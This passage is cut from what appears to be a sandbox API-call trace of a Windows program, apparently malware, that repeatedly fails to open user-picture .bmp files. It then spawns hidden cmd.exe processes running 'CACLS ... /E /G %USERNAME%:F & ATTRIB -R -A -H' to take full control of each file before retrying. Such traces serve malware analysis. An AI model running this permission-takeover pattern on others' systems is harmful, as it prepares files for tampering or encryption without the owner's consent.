%s") returned 0x19 [0180.516] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0180.516] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.516] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.516] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0180.516] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0180.516] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0180.516] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.516] ReleaseMutex (hMutex=0xf8) returned 1 [0180.516] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.516] ReleaseMutex (hMutex=0xf8) returned 1 [0180.516] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.516] ReleaseMutex (hMutex=0xf8) returned 1 [0180.516] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.517] ReleaseMutex (hMutex=0xf8) returned 1 [0180.517] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0180.517] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp", lpFilePart=0x12eab4*="usertile14.bmp") returned 0x52 [0180.517] GetLastError () returned 0x5 [0180.517] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0180.517] LocalFree (hMem=0x1c6cc8) returned 0x0 [0180.517] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0180.517] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0180.517] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.517] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.517] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0180.517] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0180.517] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcfc, dwThreadId=0x46c)) returned 1 [0180.519] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0181.887] CloseHandle (hObject=0x1b4) returned 1 [0181.887] CloseHandle (hObject=0x120) returned 1 [0181.887] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.887] ReleaseMutex (hMutex=0xf8) returned 1 [0181.887] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.887] ReleaseMutex (hMutex=0xf8) returned 1 [0181.887] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.887] ReleaseMutex (hMutex=0xf8) returned 1 [0181.887] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.887] ReleaseMutex (hMutex=0xf8) returned 1 [0181.888] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.888] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile14.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp", lpFilePart=0x12eab4*="usertile14.bmp") returned 0x52 [0181.888] GetLastError () returned 0x5 [0181.888] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0181.888] LocalFree (hMem=0x1c6cc8) returned 0x0 [0181.888] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0181.888] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0181.888] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0181.888] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0181.888] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0181.888] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0181.888] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0181.888] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.888] ReleaseMutex (hMutex=0xf8) returned 1 
[0181.888] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.888] ReleaseMutex (hMutex=0xf8) returned 1 [0181.888] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.888] ReleaseMutex (hMutex=0xf8) returned 1 [0181.888] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.888] ReleaseMutex (hMutex=0xf8) returned 1 [0181.889] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.913] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", lpFilePart=0x12eab4*="usertile15.bmp") returned 0x52 [0181.913] GetLastError () returned 0x5 [0181.913] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0181.913] LocalFree (hMem=0x1c6cc8) returned 0x0 [0181.913] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0181.913] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0181.914] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0181.914] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0181.914] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0181.914] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0181.914] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbf4, dwThreadId=0xbec)) returned 1 [0181.916] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0182.269] CloseHandle 
(hObject=0x1b4) returned 1 [0182.269] CloseHandle (hObject=0x120) returned 1 [0182.269] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.269] ReleaseMutex (hMutex=0xf8) returned 1 [0182.269] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.269] ReleaseMutex (hMutex=0xf8) returned 1 [0182.269] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.269] ReleaseMutex (hMutex=0xf8) returned 1 [0182.269] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.269] ReleaseMutex (hMutex=0xf8) returned 1 [0182.269] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.269] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", lpFilePart=0x12eab4*="usertile15.bmp") returned 0x52 [0182.269] GetLastError () returned 0x5 [0182.269] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0182.270] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.270] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0182.270] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.270] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.270] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.270] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.270] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.270] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0182.270] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.270] ReleaseMutex (hMutex=0xf8) returned 1 [0182.270] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.270] ReleaseMutex (hMutex=0xf8) returned 1 [0182.270] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.270] ReleaseMutex (hMutex=0xf8) returned 1 [0182.270] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.270] ReleaseMutex (hMutex=0xf8) returned 1 [0182.270] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0182.271] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp", lpFilePart=0x12eab4*="usertile16.bmp") returned 0x52 [0182.271] GetLastError () returned 0x5 [0182.271] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0182.271] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.271] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0182.271] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.271] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.271] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.271] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0182.271] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0182.271] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcb0, dwThreadId=0x51c)) returned 1 [0182.275] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0182.494] CloseHandle (hObject=0x1b4) returned 1 [0182.494] CloseHandle (hObject=0x120) returned 1 [0182.495] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.495] ReleaseMutex (hMutex=0xf8) returned 1 [0182.495] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.495] ReleaseMutex (hMutex=0xf8) returned 1 [0182.495] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.497] ReleaseMutex (hMutex=0xf8) returned 1 [0182.497] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.497] ReleaseMutex (hMutex=0xf8) returned 1 [0182.497] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.497] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile16.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp", lpFilePart=0x12eab4*="usertile16.bmp") returned 0x52 [0182.497] GetLastError () returned 0x5 [0182.497] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0182.497] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.498] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0182.498] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.498] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.498] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.498] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.498] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.498] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0182.498] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.498] ReleaseMutex (hMutex=0xf8) returned 1 
[0182.498] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.498] ReleaseMutex (hMutex=0xf8) returned 1 [0182.498] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.498] ReleaseMutex (hMutex=0xf8) returned 1 [0182.498] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.498] ReleaseMutex (hMutex=0xf8) returned 1 [0182.498] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.499] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", lpFilePart=0x12eab4*="usertile17.bmp") returned 0x52 [0182.499] GetLastError () returned 0x5 [0182.499] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0182.499] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.499] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0182.499] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.499] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.499] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.499] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0182.499] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0182.499] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc54, dwThreadId=0xa20)) returned 1 [0182.502] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0182.919] CloseHandle 
